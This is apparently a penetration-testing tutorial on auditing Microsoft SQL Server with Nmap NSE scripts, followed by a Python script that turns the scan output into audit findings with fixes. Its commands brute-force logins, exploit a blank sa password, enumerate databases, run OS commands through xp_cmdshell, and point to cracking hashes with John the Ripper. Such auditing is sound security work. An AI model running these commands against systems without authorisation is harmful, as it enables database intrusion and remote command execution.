The Nmap Scripting Engine (NSE) lets us use Nmap not only as a port scanner but as a complete penetration-testing platform.
In this post we will go through some techniques that we can apply on a network to check it.
By default, Microsoft SQL Server listens on TCP port 1433.
Opening nmap, we can run the following command:
nmap -p1433 --script ms-sql-info xxx.xxx.xxx.xxx (the IP of the SQL Server)
The combination of nmap and the Nmap Scripting Engine immediately gives us information about the SQL Server version as well as the instance name.
The Nmap Scripting Engine also includes ms-sql-brute, which checks the passwords.
The command is nmap -p1433 --script ms-sql-brute xxx.xxx.xxx.xxx. If we do not find anything we can use a custom password list; assuming the file with the passwords is pass.txt, the command becomes:
nmap -p1433 --script ms-sql-brute --script-args userdb=/var/pass.txt,passdb=/var/pass.txt xxx.xxx.xxx.xxx
At the same time, the Nmap Scripting Engine lets us find empty passwords in infrastructures with Microsoft SQL Server.
The command is as follows:
nmap -p1433 --script ms-sql-empty-password xxx.xxx.xxx.xxx
Here we see that the sa account has no password. To find which databases sa has access to, we use the ms-sql-hasdbaccess script with the following arguments:
nmap -p1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa xxx.xxx.xxx.xxx
Then we list the tables in those databases with the following command:
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa xxx.xxx.xxx.xxx
In older versions of MSSQL (SQL Server 2000) xp_cmdshell is enabled by default, and we can execute operating system commands through Nmap scripts such as:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa xxx.xxx.xxx.xxx
Continuing:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args ms-sql-xp-cmdshell.cmd='net users',mssql.username=sa xxx.xxx.xxx.xxx
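After running the ms-sql-* scripts above with -oX, the results need to be turned into something an administrator can act on. The following Python script is an added example, not part of the original post or of Nmap: it parses an Nmap XML report, picks out the ms-sql-info version and instance name, any login that ms-sql-empty-password reports as having an empty password, and whether ms-sql-xp-cmdshell managed to run a command, and attaches a severity and a fix to each finding. The sample XML is constructed for the example and mirrors the NSE output layout; the exact element and attribute names are an assumption, as is the severity scheme.

```python
"""Audit report from Nmap XML output of the ms-sql-* NSE scripts.

Added example: parse an -oX report, emit findings with severity and fix.
The XML below is constructed for this example (not real scan data) and
assumes the table/elem layout that NSE uses for structured output.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample, resembling what
#   nmap -p1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell -oX scan.xml 192.0.2.10
# might write for a SQL Server 2000 host with a blank sa password.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
<host><status state="up"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/>
<script id="ms-sql-info" output="[192.0.2.10:1433]">
 <table key="192.0.2.10:1433">
  <elem key="Instance name">MSSQLSERVER</elem>
  <table key="Version">
   <elem key="name">Microsoft SQL Server 2000</elem>
   <elem key="number">8.00.194</elem>
  </table>
  <elem key="TCP port">1433</elem>
 </table>
</script>
<script id="ms-sql-empty-password" output="[192.0.2.10:1433]&#10;  sa:&lt;empty&gt; =&gt; Login Success"/>
<script id="ms-sql-xp-cmdshell" output="[192.0.2.10:1433]&#10;  Command: net users&#10;  output&#10;  ======"/>
</port></ports></host></nmaprun>
"""

SEVERITY_RANK = {"info": 0, "high": 1, "critical": 2}


def parse_report(xml_text):
    """Return a list of findings {host, port, severity, issue, fix} from Nmap XML."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.iter("port"):
            portid = port.get("portid")
            for script in port.findall("script"):
                sid = script.get("id")
                out = script.get("output", "")
                if sid == "ms-sql-info":
                    # One <table> per discovered instance, with a nested Version table.
                    for inst in script.findall("table"):
                        name = inst.findtext("elem[@key='Instance name']", "?")
                        ver = inst.find("table[@key='Version']")
                        vname = ver.findtext("elem[@key='name']", "?") if ver is not None else "?"
                        vnum = ver.findtext("elem[@key='number']", "?") if ver is not None else "?"
                        # SQL Server 2000 reports engine version 8.x and is long out of support.
                        sev = "high" if vnum.startswith("8.") else "info"
                        findings.append(dict(
                            host=addr, port=portid, severity=sev,
                            issue=f"instance {name} runs {vname} ({vnum})",
                            fix="upgrade to a supported SQL Server release" if sev == "high" else "none"))
                elif sid == "ms-sql-empty-password":
                    # Script prints lines like "  sa:<empty> => Login Success".
                    for m in re.finditer(r"^\s*([^:\s]+):<empty> => Login Success", out, re.M):
                        findings.append(dict(
                            host=addr, port=portid, severity="critical",
                            issue=f"login '{m.group(1)}' has an empty password",
                            fix="set a strong password and disable or rename sa"))
                elif sid == "ms-sql-xp-cmdshell" and "Command:" in out:
                    findings.append(dict(
                        host=addr, port=portid, severity="critical",
                        issue="xp_cmdshell is enabled and reachable over the network",
                        fix="EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;"))
    return findings


def worst_severity(findings):
    """Highest severity present, 'info' when there are no findings."""
    if not findings:
        return "info"
    return max((f["severity"] for f in findings), key=SEVERITY_RANK.__getitem__)


if __name__ == "__main__":
    report = parse_report(SAMPLE_XML)
    for f in report:
        print(f"{f['host']}:{f['port']} [{f['severity']}] {f['issue']} -> {f['fix']}")
    print("overall:", worst_severity(report))
```

To use it on a real scan, replace SAMPLE_XML with the contents of the file written by -oX; the severity thresholds and the fix text are the example's own choices and should be adjusted to the organisation's policy.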
We should also mention that nmap and the Nmap Scripting Engine can be used together with other tools such as John the Ripper: with John the Ripper we can take the extracted database password hashes and proceed with password cracking.
Warm thanks to SecTeam @johnzontos.